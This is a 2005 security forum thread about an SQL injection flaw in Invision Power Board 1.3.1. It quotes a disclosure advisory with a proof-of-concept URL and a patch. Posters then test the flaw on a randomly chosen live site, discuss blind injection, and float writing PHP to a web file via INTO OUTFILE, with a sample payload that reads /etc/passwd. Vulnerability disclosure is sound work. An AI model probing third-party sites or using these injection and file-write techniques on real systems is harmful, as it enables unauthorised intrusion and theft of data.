Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 789
Members: 0
Total: 789
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Sql Injection in Invision Power Board Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Sql Injection in Invision Power Board
PostPosted: Tue Apr 12, 2005 12:52 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Just found this advisory:

http://www.securityfocus.com/archive/1/395515/2005-04-09/2005-04-15/0

Quote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory (http://www.digitalparadox.org/services.ah)
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Severity: Medium
Title: Invision board 1.3.1 and below are vulnerable to a sql injection vulnerability
[PATCH INCLUDED]
Date: 09/04/2005

Vendor: Invision Invision Power Services
Vendor Website: http://www.invisionboard.com/
Summary: Invision board 1.3.1 and lower are vulnerable to a sql injection vulnerability
which is caused by the non validation of input in the $this->first variable


**********************************************************************************************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more
at http://www.digitalparadox.org/services.ah
**********************************************************************************************************

Proof of Concept Exploit:

http://localhost/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION

**************
Patch info
**************
A patched version of the vulnerable file can be found at, http://www.digitalparadox.org/memberlist.txt

Just replace /uploads/sources/memberlist.php with this, and it will be fixed.

A simple patch can be,

In /uploads/sources/memberlist.php on Line 274 add this code
[CODE BEGINS]

if (!is_numeric($this->first)) {
$this->first = "0";
}

[CODE ENDS]

So it should finally look like,
[CODE BEGINS]

$this->output .= $this->html->Page_header( array( 'SHOW_PAGES' =>
$links) );

//-----------------------------
// START THE LISTING
//-----------------------------
if (!is_numeric($this->first)) {
$this->first = "0";
}

$DB->query("SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title,
m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions

[CODE ENDS]


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com,
please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Lookout for my soon to come out book on Secure coding with
php.


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlqrUSZV5e8av/DUEQJMtQCfZWYAAYfGX5zfmCWHxMGZffi87tUAnRGj
hAJ8nVzhK+VIlL4iPxDJRh02
=n3TC
-----END PGP SIGNATURE-----


So why not test it in real world - picked up an random site:

Code:

http://****.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=f00bar


And we can see nice debug message:

Code:

There appears to be an error with the *** Community Forums database.
You can try to refresh the page by clicking here, if this does not fix the error, you can contact the board administrator by clicking here

Error Returned


mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
                         me.photo_location, me.photo_type, me.photo_dimensions
                FROM ibf_members m
                  LEFT JOIN ibf_member_extra me ON me.id=m.id
                  LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
                WHERE m.id > 0 AND m.mgroup='1'  AND g.g_hide_from_list <> 1
                ORDER BY m.name asc
                LIMIT f00bar,30

mySQL error: You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM

We apologise for any inconvenience


So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Apr 12, 2005 6:34 pm Reply with quote
Alkaen
Regular user
Regular user
 
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair




All steps are okay.. but how i can exploit this sql injection?!

So that's mean what i've to do after appearing of the error message?

Thanx..
View user's profile Send private message Visit poster's website
PostPosted: Wed Apr 13, 2005 4:05 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Does invision use SHA1 ???? I never knew...... and I never used. Ive got a cracked version of vBulletin 3.0 that Ive used but I've never used invision trail or full.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 13, 2005 11:42 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Alkaen wrote:
All steps are okay.. but how i can exploit this sql injection?!

So that's mean what i've to do after appearing of the error message?

Thanx..


Well, it's complicated. There is need for blind sql attack methods and subqueries (i suggest benchmark() function). But as far as i know, most of the mysql databases on internet right now are version < 4.1.x and so they have no subqueries functionality Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 13, 2005 11:45 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes I'm still wondering why Fedora Core 3 came with MySql 3 it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 13, 2005 11:48 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
Yes I'm still wondering why Fedora Core 3 came with MySql 3 it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.


Yeah, this is frustrating,. when you have found some nice sql injection hole in some prominent website and then will see - b00m - no UNION possibilities Very Happy
Wtf? It's 21. century, webmasters and admins!!! Cmn, we want union tricks to be working!! We want subqueries to be working!! And in future, we want multiple queries in mysql/php platform too (like now in mssql/oracle) Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 13, 2005 11:51 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




They take the things you love and dont bother to give a few things to replace.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 15, 2005 1:10 pm Reply with quote
Ratinho
Beginner
Beginner
 
Joined: Mar 20, 2005
Posts: 2




thank you very much...
View user's profile Send private message Send e-mail ICQ Number
Hey..
PostPosted: Mon Apr 25, 2005 2:40 pm Reply with quote
Dcrab
Valuable expert
Valuable expert
 
Joined: Apr 25, 2005
Posts: 7




Hey,
Waraxe: you hit the money with that post about frustration lol.. after all that auditing when you come to know its not exploitable.. lol thats frustrating, you probably know what i mean heh btw if you msn catch me at dcrab[at]hackerscenter[dotdotodotdotodotspamdotdotdot]com itll be nice to talk to you.
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Apr 25, 2005 4:46 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Hi, Dcrab! Nice to see ya! So much advisories from you ... its amazing Smile
If this will continue, then i don't have soon any targets to analyze Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Apr 25, 2005 6:32 pm Reply with quote
Dcrab
Valuable expert
Valuable expert
 
Joined: Apr 25, 2005
Posts: 7




haha i know what you mean.. i have already run out of ideas :p do you msn..?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Re: Sql Injection in Invision Power Board
PostPosted: Mon Apr 25, 2005 10:21 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




waraxe wrote:

So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality Rolling Eyes


hym.. lock.. if you have right in mysql... (INTO) that LIMIT 0,10 INTO OUTFILE '/path/file.php'/*

if you can to m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions insert php code (example <? exec('cat /etc/passwd'); ?>)...

can you include file.
View user's profile Send private message Visit poster's website
Re: Sql Injection in Invision Power Board
PostPosted: Mon Apr 25, 2005 10:29 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




cXIb8O3 wrote:
waraxe wrote:

So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality Rolling Eyes


hym.. lock.. if you have right in mysql... (INTO) that LIMIT 0,10 INTO OUTFILE '/path/file.php'/*

if you can to m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions insert php code (example <? exec('cat /etc/passwd'); ?>)...

can you include file.


From mysql manual:

http://dev.mysql.com/doc/mysql/en/select.html

Code:

13.1.7. SELECT Syntax
13.1.7.1. JOIN Syntax
13.1.7.2. UNION Syntax
SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr, ...
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name']
    [FROM table_references
      [WHERE where_definition]
      [GROUP BY {col_name | expr | position}
        [ASC | DESC], ... [WITH ROLLUP]]
      [HAVING where_definition]
      [ORDER BY {col_name | expr | position}
        [ASC | DESC] , ...]
      [LIMIT {[offset,] row_count | row_count OFFSET offset}]
      [PROCEDURE procedure_name(argument_list)]
      [FOR UPDATE | LOCK IN SHARE MODE]]


As i can understand, after "LIMIT x,y" there can be only subqueries useful maybe...
But this is right - if we have sql injection with INSERT INTO possibility and current mysql user has file operation permissions, then we can try to write out file with php/perl/whatever code inside, and therefore such sql injection can be possibly turned out to possible shell level access.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Apr 25, 2005 10:33 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Dcrab wrote:
haha i know what you mean.. i have already run out of ideas :p do you msn..?


I prefer quiet peaceful life, so no msn/ym/icq/irc/skype/cellphone Smile
But in very rare cases i use yahoo messenger. You can email me, i am checking my mailbox many times a day.
View user's profile Send private message Send e-mail Visit poster's website
Re: Sql Injection in Invision Power Board
PostPosted: Mon Apr 25, 2005 10:48 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




waraxe wrote:

mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM


in this query... we can't use UNION because is there ORDER BY. ; ] but after LIMIT you can use UNION
View user's profile Send private message Visit poster's website
Sql Injection in Invision Power Board
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.147 Seconds